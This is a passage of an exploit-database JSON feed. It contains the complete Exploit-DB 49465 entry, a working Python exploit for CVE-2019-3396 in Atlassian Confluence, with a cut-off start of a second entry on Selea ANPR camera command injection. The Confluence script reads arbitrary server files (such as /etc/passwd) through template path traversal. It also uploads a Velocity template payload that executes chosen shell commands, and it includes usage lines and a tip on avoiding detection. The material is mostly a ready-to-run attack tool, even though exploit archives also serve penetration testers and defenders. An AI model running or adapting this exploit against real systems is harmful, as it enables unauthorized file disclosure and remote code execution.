"EDB-ID:49465", "href": "https://www.exploit-db.com/exploits/49465", "sourceData": "# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \r\n# Date: 21-Jan-2021\r\n# Exploit Author: 46o60\r\n# Vendor Homepage: https://www.atlassian.com/software/confluence\r\n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n# Version: 6.12.1\r\n# Tested on: Ubuntu 20.04.1 LTS\r\n# CVE : CVE-2019-3396\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\n\r\nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian\r\nConfluence Server server-side template injection.\r\n\r\nVulnerability information:\r\n Authors:\r\n Daniil Dmitriev - Discovering vulnerability\r\n Dmitry (rrock) Shchannikov - Metasploit module\r\n Exploit\r\n ExploitDB:\r\n https://www.exploit-db.com/exploits/46731\r\n Metasploit\r\n https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/\r\n exploit/multi/http/confluence_widget_connector\r\n\r\nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made\r\nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being\r\nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all\r\noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this\r\nalternative approach by first uploading the template to the server and then loading it with original vulnerability from\r\nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any\r\nuser can upload a file to the server by attaching the file to his \"personal space\".\r\n\r\nThere are two modes of the exploit:\r\n 1. Exploiting path traversal for file disclosure and directory listings.\r\n 2. RCE by uploading a template file with payload to the server.\r\n\r\nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged\r\nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode\r\nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path\r\nis pointing to. As in original exploit no authentication is needed for this mode.\r\n\r\nLimitations of path traversal exploit:\r\n- not possible to distinguish between non-existent path and lack of permissions\r\n- no distinction between files and directories in the output\r\n\r\nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A\r\nregular user probably has enough privileges for this since each user can have their own personal space where they\r\nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not\r\nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file\r\nwith payload from local filesystem instead from remote system.\r\n\r\nPrerequisite of RCE in this exploit:\r\n- authenticated session is needed\r\n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode\r\nto find it, should be in Confluence install directory under ./attachments subdirectory\r\n\r\nUsage\r\n- list /etc folder on Confluence server hosted on http://confluence.example.com\r\n python exploit.py -th confluence.example.com fs /etc\r\n- get content of /etc/passwd on same server but through a proxy\r\n python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd\r\n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using\r\nexisting session)\r\n python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\"\r\n\r\nTested on Confluence versions:\r\n 6.12.1\r\n\r\nTo test the exploit:\r\n 1. Download Confluence trial version for version 6.12.1\r\n https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser\r\n network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and\r\n change the version in URL to be 6.12.1)\r\n SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin\r\n 2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default.\r\n chmod +x atlassian-confluence-6.12.1-x64.bin\r\n sudo ./atlassian-confluence-6.12.1-x64.bin\r\n 3. Open the browser to configure initial installation, when you get to license window copy the server ID.\r\n 4. Create account at https://my.atlassian.com/ and request for new trial license using server ID.\r\n 5. Activate the license and finish the installation with default options.\r\n 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the\r\n exploit.\r\n 7. Run the exploit (see usage above).\r\n\"\"\"\r\n\r\n__version__ = \"1.0.0\"\r\n__author__ = \"46o60\"\r\n\r\nimport argparse\r\nimport logging\r\nimport requests\r\nimport urllib3\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport json\r\nimport random\r\nimport string\r\n\r\n# script and banner\r\nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\"\r\nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \r\n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \r\n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \r\n \r\n\"\"\"\r\n\r\n# turn off requests log output\r\nurllib3.disable_warnings()\r\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\r\n\r\n\r\ndef print_banner():\r\n \"\"\"\r\n Prints script ASCII banner and basic information.\r\n\r\n Because it is cool.\r\n \"\"\"\r\n print(ASCII_BANNER_TEXT)\r\n print(\"{} v{}\".format(SCRIPT_NAME, __version__))\r\n print(\"Author: {}\".format(__author__))\r\n print()\r\n\r\n\r\ndef exit_log(logger, message):\r\n \"\"\"\r\n Utility function to log exit message and finish the script.\r\n \"\"\"\r\n logger.error(message)\r\n exit(1)\r\n\r\n\r\ndef check_cookie_format(value):\r\n \"\"\"\r\n Checks if value is in format: ^[^=]+=[^=]+$\r\n \"\"\"\r\n pattern = r\"^[^=]+=[^=]+$\"\r\n if not re.match(pattern, value):\r\n raise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\")\r\n return value\r\n\r\n\r\ndef parse_arguments():\r\n \"\"\"\r\n Performs parsing of script arguments.\r\n \"\"\"\r\n # creating parser\r\n parser = argparse.ArgumentParser(\r\n prog=SCRIPT_NAME,\r\n description=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\"\r\n )\r\n\r\n # general script arguments\r\n parser.add_argument(\r\n \"-V\", \"--version\",\r\n help=\"displays the current version of the script\",\r\n action=\"version\",\r\n version=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__)\r\n )\r\n parser.add_argument(\r\n \"-v\", \"--verbosity\",\r\n help=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\",\r\n action=\"count\",\r\n default=0\r\n )\r\n parser.add_argument(\r\n \"-sb\", \"--skip-banner\",\r\n help=\"skips printing of the banner\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-s\", \"--silent\",\r\n help=\"do not output results of the exploit to standard output\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-q\", \"--quiet\",\r\n help=\"do not output any logs\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n\r\n # arguments for input\r\n parser.add_argument(\r\n \"-px\", \"--proxy\",\r\n help=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\"\r\n )\r\n parser.add_argument(\r\n \"-t\", \"--tls\",\r\n help=\"use HTTPS protocol, default behaviour is to use plain HTTP\",\r\n action=\"store_true\"\r\n )\r\n parser.add_argument(\r\n \"-th\", \"--target-host\",\r\n help=\"target hostname/domain\",\r\n required=True\r\n )\r\n parser.add_argument(\r\n \"-p\", \"--port\",\r\n help=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\"\r\n )\r\n\r\n # two different sub commands\r\n subparsers = parser.add_subparsers(\r\n title=\"actions\",\r\n description=\"different behaviours of the script\",\r\n help=\"for detail description of available action options invoke -h for each individual action\",\r\n dest=\"action\"\r\n )\r\n\r\n # only exploring file system by disclosure of files and directories\r\n parser_file_system = subparsers.add_parser(\r\n \"fs\",\r\n help=\"use the exploit to browse local file system on the target endpoint\"\r\n )\r\n parser_file_system.add_argument(\r\n \"path\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_file_system.set_defaults(func=exploit_path_traversal)\r\n\r\n # using file upload to deploy payload and achieve RCE\r\n parser_rce = subparsers.add_parser(\r\n \"rce\",\r\n help=\"use the exploit to upload a template \"\r\n )\r\n parser_rce.add_argument(\r\n \"-hd\", \"--home-directory\",\r\n help=\"Confluence home directory on the server\"\r\n )\r\n parser_rce.add_argument(\r\n \"-c\", \"--cookie\",\r\n help=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \"\r\n \"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\",\r\n type=check_cookie_format,\r\n required=True\r\n )\r\n parser_rce.add_argument(\r\n \"command\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_rce.set_defaults(func=exploit_rce)\r\n\r\n # parsing\r\n arguments = parser.parse_args()\r\n\r\n return arguments\r\n\r\n\r\nclass Configuration:\r\n \"\"\"\r\n Represents all supported configuration items.\r\n \"\"\"\r\n\r\n # Parse arguments and set all configuration variables\r\n def __init__(self, script_args):\r\n self.script_arguments = script_args\r\n\r\n # setting input arguments\r\n self._proxy = self.script_arguments.proxy\r\n self._target_protocol = \"https\" if self.script_arguments.tls else \"http\"\r\n self._target_host = self.script_arguments.target_host\r\n self._target_port = self.script_arguments.port if self.script_arguments.port else \\\r\n 443 if self.script_arguments.tls else 80\r\n\r\n @staticmethod\r\n def get_logger(verbosity):\r\n \"\"\"\r\n Prepares logger to output to stdout with appropriate verbosity.\r\n \"\"\"\r\n logger = logging.getLogger()\r\n # default logging level\r\n logger.setLevel(logging.DEBUG)\r\n\r\n # Definition of logging to console\r\n ch = logging.StreamHandler()\r\n # specific logging level for console\r\n if verbosity == 0:\r\n ch.setLevel(logging.INFO)\r\n elif verbosity > 0:\r\n ch.setLevel(logging.DEBUG)\r\n\r\n # formatting\r\n class MyFormatter(logging.Formatter):\r\n\r\n default_fmt = logging.Formatter('[?] %(message)s')\r\n info_fmt = logging.Formatter('[+] %(message)s')\r\n error_fmt = logging.Formatter('[-] %(message)s')\r\n warning_fmt = logging.Formatter('[!] %(message)s')\r\n debug_fmt = logging.Formatter('>>> %(message)s')\r\n\r\n def format(self, record):\r\n if record.levelno == logging.INFO:\r\n return self.info_fmt.format(record)\r\n elif record.levelno == logging.ERROR:\r\n return self.error_fmt.format(record)\r\n elif record.levelno == logging.WARNING:\r\n return self.warning_fmt.format(record)\r\n elif record.levelno == logging.DEBUG:\r\n return self.debug_fmt.format(record)\r\n else:\r\n return self.default_fmt.format(record)\r\n\r\n ch.setFormatter(MyFormatter())\r\n\r\n # adding handler\r\n logger.addHandler(ch)\r\n\r\n return logger\r\n\r\n # Properties\r\n @property\r\n def endpoint(self):\r\n if not self._target_protocol or not self._target_host or not self._target_port:\r\n exit_log(log, \"failed to generate endpoint URL\")\r\n return f\"{self._target_protocol}://{self._target_host}:{self._target_port}\"\r\n\r\n @property\r\n def remote_path(self):\r\n return self.script_arguments.path\r\n\r\n @property\r\n def attachment_dir(self):\r\n home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\\r\n Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR\r\n return f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\"\r\n\r\n @property\r\n def rce_command(self):\r\n return self.script_arguments.command\r\n\r\n @property\r\n def session_cookie(self):\r\n if not self.script_arguments.cookie:\r\n return None\r\n parts = self.script_arguments.cookie.split(\"=\")\r\n return {\r\n parts[0]: parts[1]\r\n }\r\n\r\n @property\r\n def proxies(self):\r\n return {\r\n \"http\": self._proxy,\r\n \"https\": self._proxy\r\n }\r\n\r\n\r\nclass Exploit:\r\n \"\"\"\r\n This class represents actual exploit towards the target Confluence server.\r\n \"\"\"\r\n # used for both path traversal and RCE\r\n DEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\"\r\n\r\n # used only for RCE\r\n CREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\"\r\n PERSONAL_SPACE_KEY_PATH = \"/index.action\"\r\n PERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\"\r\n PERSONAL_SPACE_ID_PATH = \"/rest/api/space\"\r\n PERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\"\r\n HOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\"\r\n ATL_TOKEN_PATH = \"/pages/viewpageattachments.action\"\r\n FILE_UPLOAD_PATH = \"/pages/doattachfile.action\"\r\n # file name has no real significance, file is identified on file system by it's ID\r\n # (change only if you want to avoid detection)\r\n DEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format(\r\n ''.join(random.choice(string.ascii_lowercase) for i in range(5))\r\n ) # the extension .vm is not really needed, remove it if you have problems uploading the template\r\n DEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\"\r\n DEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\"\r\n # using random name for uploaded file so it will always be first version of the file\r\n DEFAULT_FILE_VERSION = \"1\"\r\n\r\n def __init__(self, config):\r\n \"\"\"\r\n Runs the exploit towards target_url.\r\n \"\"\"\r\n self._config = config\r\n\r\n self._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\"\r\n\r\n if self._config.script_arguments.action == \"rce\":\r\n self._root_url = f\"{self._config.endpoint}/\"\r\n self._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\"\r\n self._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\"\r\n\r\n # Following data will be dynamically created while exploit is running\r\n self._space_key = None\r\n self._personal_space_id_url = None\r\n self._space_id = None\r\n self._homepage_id = None\r\n self._atl_token_url = None\r\n self._atl_token = None\r\n self._upload_url = None\r\n self._file_id = None\r\n\r\n def generate_payload_location(self):\r\n \"\"\"\r\n Generates location on file system for uploaded attachment based on Confluence Ver003 scheme.\r\n\r\n See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html\r\n \"\"\"\r\n if not self._space_id or not self._homepage_id or not self._file_id:\r\n exit_log(log, \"cannot generate payload location without space, homepage and file ID\")\r\n\r\n space_folder_one = str(int(self._space_id[-3:]) % 250)\r\n space_folder_two = str(int(self._space_id[-6:-3]) % 250)\r\n space_folder_three = self._space_id\r\n page_folder_one = str(int(self._homepage_id[-3:]) % 250)\r\n page_folder_two = str(int(self._homepage_id[-6:-3]) % 250)\r\n page_folder_three = self._homepage_id\r\n file_folder = self._file_id\r\n version = Exploit.DEFAULT_FILE_VERSION\r\n\r\n payload_location = f\"{self._config.attachment_dir}/\" \\\r\n f\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\\r\n f\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\\r\n f\"{file_folder}/{version}\"\r\n log.debug(f\"generated payload location: {payload_location}\")\r\n\r\n return payload_location\r\n\r\n def path_traversal(self, target_remote_path, decode_output=False):\r\n \"\"\"\r\n Uses vulnerability in _template parameter to achieve path traversal.\r\n\r\n Args:\r\n target_remote_path (string): path on local file system of the target application\r\n decode_output (bool): set to True if output of the file will be character codes separated by new lines,\r\n used with RCE\r\n \"\"\"\r\n post_data = {\r\n \"contentId\": str(random.randint(1, 10000)),\r\n \"macro\": {\r\n \"body\": \"\",\r\n \"name\": \"widget\",\r\n \"params\": {\r\n \"_template\": f\"file://{target_remote_path}\",\r\n \"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice(\r\n string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11))\r\n }\r\n }\r\n }\r\n\r\n log.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\")\r\n response = requests.post(\r\n self._target_url,\r\n headers={\r\n \"Content-Type\": \"application/json; charset=utf-8\"\r\n },\r\n json=post_data,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"exploit failed\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve\r\n # the requested path\r\n error_element = soup.find_all(\"div\", \"widget-error\")\r\n if error_element:\r\n log.warning(\"failed to retrieve target path on the system\")\r\n log.warning(\"target path does not exist or application does not have appropriate permissions to view it\")\r\n return \"\"\r\n else:\r\n # otherwise parse out the actual response (file content or directory listing)\r\n output_element = soup.find_all(\"div\", \"wiki-content\")\r\n\r\n if not output_element:\r\n exit_log(log, \"application did not return appropriate HTML element\")\r\n if not len(output_element) == 1:\r\n log.warning(\"application unexpectedly returned multiple HTML elements, using the first one\")\r\n output_element = output_element[0]\r\n\r\n log.debug(\"extracting HTML element value and stripping the leading and trailing spaces\")\r\n # output = output_element.string.strip()\r\n output = output_element.decode_contents().strip()\r\n\r\n if \"The macro 'widget' is unknown. It may have been removed from the system.\" in output:\r\n exit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\")\r\n\r\n if not self._config.script_arguments.silent:\r\n if decode_output:\r\n parsed_output = \"\"\r\n p = re.compile(r\"^([0-9]+)\")\r\n for line in output.split(\"\\n\"):\r\n r = p.match(line)\r\n if r:\r\n parsed_output += chr(int(r.group(1)))\r\n print(parsed_output.strip())\r\n else:\r\n print(output)\r\n\r\n return output\r\n\r\n def find_personal_space_key(self):\r\n \"\"\"\r\n Makes request that will return personal space key in the response.\r\n \"\"\"\r\n log.debug(\"checking if user has personal space\")\r\n response = requests.get(\r\n self._root_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n )\r\n page_content = response.text\r\n if \"Add personal space\" in page_content:\r\n log.info(f\"user does not have personal space, creating it now...\")\r\n\r\n response = requests.post(\r\n self._create_personal_space_url,\r\n headers={\r\n \"Content-Type\": \"application/json\"\r\n },\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n json={\r\n \"spaceUserKey\": \"\"\r\n }\r\n )\r\n\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to create personal space\")\r\n\r\n log.debug(f\"personal space created\")\r\n response_data = response.json()\r\n self._space_key = response_data.get(\"key\")\r\n else:\r\n log.info(\"sending request to find personal space key\")\r\n response = requests.get(\r\n self._personal_space_key_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n personal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\")\r\n if not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"):\r\n exit_log(log, \"failed to find personal space link in the response, does the user have personal space?\")\r\n path = personal_space_link_element[\"href\"]\r\n p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX)\r\n r = p.match(path)\r\n if r:\r\n self._space_key = r.group(1)\r\n else:\r\n exit_log(log, \"failed to find personal space key\")\r\n\r\n log.debug(f\"personal space key: {self._space_key}\")\r\n self._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\\r\n f\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\"\r\n log.debug(f\"generated personal space id url: {self._personal_space_id_url}\")\r\n\r\n def find_personal_space_id_and_homepage_id(self):\r\n \"\"\"\r\n Makes request that will return personal space ID and homepage ID in the response.\r\n \"\"\"\r\n if self._personal_space_id_url is None:\r\n exit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find personal space ID and homepage\")\r\n response = requests.get(\r\n self._personal_space_id_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is JSON\r\n data = json.loads(page_content)\r\n\r\n if \"results\" not in data:\r\n exit_log(log, \"failed to find 'result' section in json output\")\r\n items = data[\"results\"]\r\n if type(items) is not list or len(items) == 0:\r\n exit_log(log, \"no results for personal space id\")\r\n personal_space_data = items[0]\r\n if \"id\" not in personal_space_data:\r\n exit_log(log, \"failed to find ID in personal space data\")\r\n self._space_id = str(personal_space_data[\"id\"])\r\n log.debug(f\"found space id: {self._space_id}\")\r\n if \"_expandable\" not in personal_space_data:\r\n exit_log(log, \"failed to find '_expandable' section in personal space data\")\r\n personal_space_expandable_data = personal_space_data[\"_expandable\"]\r\n if \"homepage\" not in personal_space_expandable_data:\r\n exit_log(log, \"failed to find homepage in personal space expandable data\")\r\n homepage_path = personal_space_expandable_data[\"homepage\"]\r\n p = re.compile(Exploit.HOMEPAGE_REGEX)\r\n r = p.match(homepage_path)\r\n if r:\r\n self._homepage_id = r.group(1)\r\n log.debug(f\"found homepage id: {self._homepage_id}\")\r\n self._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated atl token url: {self._atl_token_url}\")\r\n self._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated upload url: {self._upload_url}\")\r\n else:\r\n exit_log(log, \"failed to find homepage id, homepage path has incorrect format\")\r\n\r\n def get_csrf_token(self):\r\n \"\"\"\r\n Makes request to get the current CSRF token for the session.\r\n \"\"\"\r\n if self._atl_token_url is None:\r\n exit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find CSRF token\")\r\n response = requests.get(\r\n self._atl_token_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n atl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"})\r\n if not atl_token_element.has_attr(\"value\"):\r\n exit_log(log, \"failed to find value for atl_token\")\r\n self._atl_token = atl_token_element[\"value\"]\r\n log.debug(f\"found CSRF token: {self._atl_token}\")\r\n\r\n def upload_template(self):\r\n \"\"\"\r\n Makes multipart request to upload the template file to the server.\r\n \"\"\"\r\n log.info(\"uploading template to server\")\r\n if not self._atl_token:\r\n exit_log(log, \"cannot upload a file without CSRF token\")\r\n if self._upload_url is None:\r\n exit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\")\r\n\r\n # Velocity template here executes command and then captures the output. Here the output is generated by printing\r\n # character codes one by one in each line. This can be improved for sure but did not have time to investigate\r\n # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern\r\n # webapp' was not working properly. This gets decoded on our python client later.\r\n template = f\"\"\"#set( $test = \"test\" )\r\n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\"))\r\n#set($exout = $ex.waitFor())\r\n#set($out = $ex.getInputStream())\r\n#foreach($i in [1..$out.available()])\r\n#set($ch = $out.read())\r\n$ch\r\n#end\"\"\"\r\n\r\n log.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\")\r\n parts = {\r\n \"atl_token\": (None, self._atl_token),\r\n \"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template),\r\n \"confirm\": \"Attach\"\r\n }\r\n response = requests.post(\r\n self._upload_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n files=parts\r\n )\r\n\r\n # for successful upload first a 302 response needs to happen then 200 page is returned with file ID\r\n if response.status_code == 403:\r\n exit_log(log, \"got 403, probably problem with CSRF token\")\r\n if not len(response.history) == 1 or not response.history[0].status_code == 302:\r\n exit_log(log, \"failed to upload the payload\")\r\n\r\n page_content = response.content\r\n\r\n if \"Upload Failed\" in str(page_content):\r\n exit_log(log, \"failed to upload template\")\r\n\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n file_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME})\r\n if not file_link_element.has_attr(\"data-linked-resource-id\"):\r\n exit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\")\r\n self._file_id = file_link_element[\"data-linked-resource-id\"]\r\n log.debug(f\"found file ID: {self._file_id}\")\r\n\r\n\r\ndef exploit_path_traversal(config):\r\n \"\"\"\r\n This sends one request towards vulnerable server to either get local file content or directory listing.\r\n \"\"\"\r\n log.debug(\"running path traversal exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.path_traversal(config.remote_path)\r\n\r\n\r\ndef exploit_rce(config):\r\n \"\"\"This executes multiple steps to gain RCE. Requires a session token.\r\n\r\n Steps:\r\n 1. find personal space key for the user\r\n 2. find personal space ID and homepage ID for the user\r\n 3. get CSRF token (generated per session)\r\n 4. upload template file with Java code (involves two requests, first one is 302 redirection)\r\n 5. use path traversal part of exploit to load and execute local template file\r\n 6. profit\r\n \"\"\"\r\n log.debug(\"running RCE exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.find_personal_space_key()\r\n exploit.find_personal_space_id_and_homepage_id()\r\n exploit.get_csrf_token()\r\n exploit.upload_template()\r\n payload_location = exploit.generate_payload_location()\r\n exploit.path_traversal(payload_location, decode_output=True)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # parse arguments and load all configuration items\r\n script_arguments = parse_arguments()\r\n log = Configuration.get_logger(script_arguments.verbosity)\r\n\r\n configuration = Configuration(script_arguments)\r\n\r\n # printing banner\r\n if not configuration.script_arguments.skip_banner:\r\n print_banner()\r\n\r\n if script_arguments.quiet:\r\n log.disabled = True\r\n\r\n log.debug(\"finished parsing CLI arguments\")\r\n log.debug(\"configuration was loaded successfully\")\r\n log.debug(\"starting exploit\")\r\n\r\n # disabling warning about trusting self sign certificate from python requests\r\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\n # run appropriate function depending on mode\r\n configuration.script_arguments.func(configuration)\r\n\r\n log.debug(\"done!\")", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49465"}, {"lastseen": "2021-01-22T09:06:22", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Selea Targa IP OCR-ANPR Camera - &#039;addr&#039; Remote Code Execution (Unauthenticated)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49460", "href": "https://www.exploit-db.com/exploits/49460", "sourceData": "# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)\r\n# Date: 07.11.2020\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.selea.com\r\n\r\n#!/bin/bash\r\n#\r\n# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution\r\n#\r\n#\r\n# Vendor: Selea s.r.l.\r\n# Product web page: https://www.selea.com\r\n# Affected version: Model: iZero\r\n# Targa 512\r\n# Targa 504\r\n# Targa Semplice\r\n# Targa 704 TKM\r\n# Targa 805\r\n# Targa 710 INOX\r\n# Targa 750\r\n# Targa 704 ILB\r\n# Firmware: BLD201113005214\r\n# BLD201106163745\r\n# BLD200304170901\r\n# BLD200304170514\r\n# BLD200303143345\r\n# BLD191118145435\r\n# BLD191021180140\r\n# BLD191021180140\r\n# CPS: 4.013(201105)\r\n# 3.100(200225)\r\n# 3.005(191206)\r\n# 3.005(191112)\r\n#\r\n# Summary: IP camera with optical character recognition (OCR) software for automatic\r\n# number plate recognition (ANPR) also equipped with ADR system that enables it to read\r\n# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number\r\n# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number\r\n# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes\r\n# this camera suitable for all installation conditions. Its built-in OCR software works\r\n# as an automatic and independent system without the need of a computer, thus giving\r\n# autonomy to the device even in the event of an interruption in the connection between\r\n# the camera and the operations centre.\r\n#\r\n# Desc: Selea suffers from an authenticated command injection vulnerability. This can be\r\n# exploited to inject and execute arbitrary shell commands as the www-data user through\r\n# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated\r\n# LFI issue an attacker can grab credentials, authenticate and execute system commands.\r\n#\r\n# =====================================================================================\r\n# /mnt/app/scripts/address_check.sh:\r\n# ----------------------------------\r\n#\r\n# 01: #!/bin/sh\r\n# 02: . /mnt/app/scripts/env.sh\r\n# 03: . /mnt/app/scripts/log.sh\r\n# 04:\r\n# 05: CMD=\"$1\"\r\n# 06: ADDR=\"$2\"\r\n# 07: PORT=\"$3\"\r\n# 08:\r\n# 09: if [ \"$CMD\" == \"ping\" ]; then\r\n# 10: 